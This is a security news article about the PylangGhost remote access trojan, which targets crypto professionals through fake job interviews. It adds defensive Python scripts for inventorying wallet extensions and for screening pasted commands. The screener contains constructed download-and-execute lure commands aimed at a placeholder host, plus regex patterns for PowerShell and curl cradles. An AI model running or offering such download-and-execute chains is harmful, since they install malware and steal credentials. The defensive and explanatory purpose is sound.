Cybersecurity experts have uncovered a disturbing campaign aimed at professionals in the blockchain sector, where fake job offers are being weaponized to deploy malicious software capable of stealing cryptocurrency wallet credentials and personal data.
According to a new report from Cisco Talos, a remote access trojan (RAT) named PylangGhost has been observed targeting cryptocurrency and blockchain professionals, particularly in India. The malware is written in Python and is attributed to a North Korean state-backed group tracked as "Famous Chollima" (also known as "Wagemole").
Deceptive Job Offers: The Perfect Bait
Victims are drawn in through fake job listings that imitate well-known companies in the crypto world, including Coinbase, Robinhood, and Uniswap. The fraudulent sites are built to closely resemble the real ones, so applicants believe they are taking part in a genuine recruitment process.
Here's how the attack unfolds:
- Initial contact: victims receive messages from fake recruiters.
- Skill assessment trap: they are directed to seemingly legitimate sites for coding tests.
- Video interviews: targets are prompted to enable webcam and microphone access.
- Malicious payload: they are told a "video driver update" is needed and persuaded to paste specific commands into a terminal; those commands actually launch the malware.
Meet PylangGhost: A RAT with a Crypto Twist
PylangGhost, a Python-based evolution of the previously known GolangGhost malware, offers an expansive feature set. Once deployed, it grants the attackers remote control over the compromised machine and lets them harvest credentials and session data from more than 80 browser extensions, among them cryptocurrency wallets and password managers such as:
- MetaMask
- 1Password
- NordPass
- Phantom
- TronLink
- Bitski
- Initia
- MultiversX
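The stealer's extension targeting works against whatever is installed in the victim's browser profile, so the first question after a suspected infection is which wallets and vaults were present. The script below is an added example (not Talos's code and not PylangGhost's) that inventories a Chromium-style profile by walking `<profile>/Extensions/<id>/<version>/manifest.json`, resolving localized names through `_locales/<default_locale>/messages.json`, and flagging names that match a watchlist built from the article's list plus the generic keywords "wallet" and "password". `build_fixture()` constructs a fake profile with sample data so the script runs offline; pass a real profile path (for example `~/.config/google-chrome/Default` on Linux) as the first argument to inventory your own machine.

```python
"""Inventory the browser extensions a credential stealer would go after.

Added example; not Talos's or PylangGhost's code. Walks a Chromium-style
profile directory and flags high-value extensions by name. The fixture
built by build_fixture() is constructed sample data, not a real install.
"""
import json
import sys
import tempfile
from pathlib import Path

# Lower-cased substrings matched against extension names.
WATCHLIST = {"metamask", "1password", "nordpass", "phantom", "tronlink",
             "bitski", "initia", "multiversx", "wallet", "password"}


def _resolve_name(ext_dir: Path, manifest: dict) -> str:
    """Chromium manifests may carry a localized name key such as __MSG_appName__."""
    name = manifest.get("name", "")
    if name.startswith("__MSG_") and name.endswith("__"):
        key = name[len("__MSG_"):-2]
        locale = manifest.get("default_locale", "en")
        msg_file = ext_dir / "_locales" / locale / "messages.json"
        try:
            messages = json.loads(msg_file.read_text(encoding="utf-8"))
            name = messages.get(key, {}).get("message", name)
        except (OSError, ValueError):
            pass  # keep the raw key if the locale file is missing or garbled
    return name


def inventory(profile_dir: Path) -> list[dict]:
    """Return one record per installed extension version, sorted by extension id."""
    results = []
    ext_root = Path(profile_dir) / "Extensions"
    if not ext_root.is_dir():
        return results
    for ext_id_dir in sorted(p for p in ext_root.iterdir() if p.is_dir()):
        for version_dir in sorted(p for p in ext_id_dir.iterdir() if p.is_dir()):
            manifest_path = version_dir / "manifest.json"
            if not manifest_path.is_file():
                continue
            try:
                manifest = json.loads(manifest_path.read_text(encoding="utf-8"))
            except ValueError:
                continue
            name = _resolve_name(version_dir, manifest)
            results.append({
                "id": ext_id_dir.name,
                "version": version_dir.name,
                "name": name,
                "high_value": any(k in name.lower() for k in WATCHLIST),
            })
    return results


def high_value_names(profile_dir: Path) -> list[str]:
    """Names of the extensions whose secrets must be rotated after a compromise."""
    return [e["name"] for e in inventory(profile_dir) if e["high_value"]]


def build_fixture() -> Path:
    """Construct a throwaway fake profile (sample data, not a real install)."""
    root = Path(tempfile.mkdtemp(prefix="fake-profile-"))
    # id -> (version, manifest, optional _locales/en/messages.json); ids are arbitrary here.
    fake_extensions = {
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa": (
            "1.0.0", {"name": "__MSG_appName__", "default_locale": "en"},
            {"appName": {"message": "MetaMask"}}),
        "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb": (
            "2.3.1", {"name": "1Password - Password Manager"}, None),
        "cccccccccccccccccccccccccccccccc": (
            "0.9.0", {"name": "Dark Reader"}, None),
    }
    for ext_id, (version, manifest, messages) in fake_extensions.items():
        ext_dir = root / "Extensions" / ext_id / version
        ext_dir.mkdir(parents=True)
        (ext_dir / "manifest.json").write_text(json.dumps(manifest), encoding="utf-8")
        if messages is not None:
            loc_dir = ext_dir / "_locales" / "en"
            loc_dir.mkdir(parents=True)
            (loc_dir / "messages.json").write_text(json.dumps(messages), encoding="utf-8")
    return root


if __name__ == "__main__":
    target = Path(sys.argv[1]) if len(sys.argv) > 1 else build_fixture()
    for ext in inventory(target):
        flag = "HIGH-VALUE" if ext["high_value"] else "-"
        print(f"{flag:10} {ext['id']} {ext['version']:10} {ext['name']}")
```

Name matching is deliberately loose (a substring watchlist rather than a list of extension IDs) because the same wallet ships under several store IDs across Chrome, Edge and Brave; the cost is an occasional false positive, which is the right trade-off for an incident-response checklist. Firefox stores extensions differently (`extensions.json` in the profile) and is not covered by this script.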
More Than Just a Stealer
PylangGhost isn’t limited to snatching wallet data. It comes equipped with a wide toolkit:
Same Tactics, Evolving Tools
These social engineering strategies aren't new. Similar lures were seen earlier this year, when attackers linked to the $1.4 billion Bybit crypto heist baited developers with bogus recruitment coding exercises; the exercise projects themselves carried trojans.
Was AI Involved in the Malware Code?
Analysis of the source code suggests that no large language model (such as ChatGPT) was used in its development: the comments and coding style point to hand-written code rather than AI-generated output.
How to Stay Safe
- Always verify job opportunities through official company channels, not through links or contact details supplied by the recruiter.
- Never execute terminal commands during interviews, no matter how legitimate they appear; a real video-call problem is never fixed by pasting a command from a recruiter.
- Use sandbox environments or disposable virtual machines for testing unknown applications, coding-test repositories or links.
- Keep browser extensions and password managers updated with security patches. Note that patches do not protect a wallet once a RAT is running on the host: if you did run a suspect command, treat every wallet and password vault on that machine as compromised and rotate them from a clean device.
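The "video driver update" step in the attack chain and the advice above both come down to the same check: before pasting anything a recruiter sends, look for the download-and-execute building blocks (fetch a file, unpack it, hand it to a script host or encoded PowerShell) that such lures rely on. The screen below is an added example, not code from the Talos report or from PylangGhost, and its regexes are a heuristic pre-check rather than a detection signature. The sample commands are constructed for this example and use the reserved placeholder host `example.invalid`; they are not the actual commands used in the campaign.

```python
"""Screen a command a "recruiter" asks you to paste during an interview.

Added example; not code from the Talos report or from PylangGhost. The
patterns flag common download-and-execute building blocks so the command
can be refused, or run only in a disposable VM. Sample commands below are
constructed for illustration and use the reserved host example.invalid.
"""
import re

# (regex, label) pairs; each describes one cradle building block.
CRADLE_PATTERNS = [
    (r"\b(curl|wget)\b[^|;&\n]*\|\s*(sh|bash|zsh|python\d*)\b",
     "pipe download into interpreter"),
    (r"\b(curl|wget)\b[^|;&\n]*\s(-o|--output|--output-document)\b",
     "download to disk"),
    (r"\b(Invoke-WebRequest|iwr|Invoke-Expression|iex|DownloadString|DownloadFile)\b",
     "PowerShell download cradle"),
    (r"\b(powershell|pwsh)(\.exe)?\b[^\n]*\s-e(c|nc|ncodedcommand)?\b",
     "encoded PowerShell"),
    (r"\bbase64\s+(-d|--decode)\b", "base64-decoded payload"),
    (r"\b(unzip|tar\s+-?x|Expand-Archive)\b", "archive extraction"),
    (r"\b(python\d*|node|wscript|cscript|mshta|rundll32)\b[^\n]*\b\S+\.(py|js|vbs|hta)\b",
     "script host launching a dropped file"),
    (r"\bchmod\s+\+x\b", "mark downloaded file executable"),
]

# Constructed samples: two lure-style "driver fixes" and two ordinary
# interview-task commands that should pass.
SAMPLES = {
    "fake_driver_fix_nix": (
        "curl -s https://example.invalid/driver_fix.zip -o /tmp/fix.zip "
        "&& unzip -o /tmp/fix.zip -d /tmp/fix && python3 /tmp/fix/nvidia.py"
    ),
    "fake_driver_fix_win": (
        r'powershell -NoP -W Hidden -c "iwr https://example.invalid/vc.zip '
        r'-OutFile $env:TEMP\vc.zip; Expand-Archive $env:TEMP\vc.zip $env:TEMP\vc; '
        r'wscript $env:TEMP\vc\update.vbs"'
    ),
    "benign_git_clone": "git clone https://example.invalid/acme/coding-test.git",
    "benign_npm": "npm install && npm test",
}


def screen_command(cmd: str) -> list[str]:
    """Return the labels of every cradle building block found in cmd, in pattern order."""
    return [label for pattern, label in CRADLE_PATTERNS
            if re.search(pattern, cmd, re.IGNORECASE)]


def verdict(cmd: str) -> str:
    """Crude policy: one hit is suspicious, two or more is a full download-and-execute cradle."""
    hits = screen_command(cmd)
    if not hits:
        return "no download-and-execute indicators"
    if len(hits) == 1:
        return "suspicious: " + hits[0]
    return "refuse: " + ", ".join(hits)


if __name__ == "__main__":
    for name, cmd in SAMPLES.items():
        print(f"{name}: {verdict(cmd)}")
```

The screen will also flag legitimate setup instructions (a `curl | bash` installer, for instance), which is the point: during a job interview there is no legitimate reason to run any of these, so a hit should end the session rather than prompt a closer look.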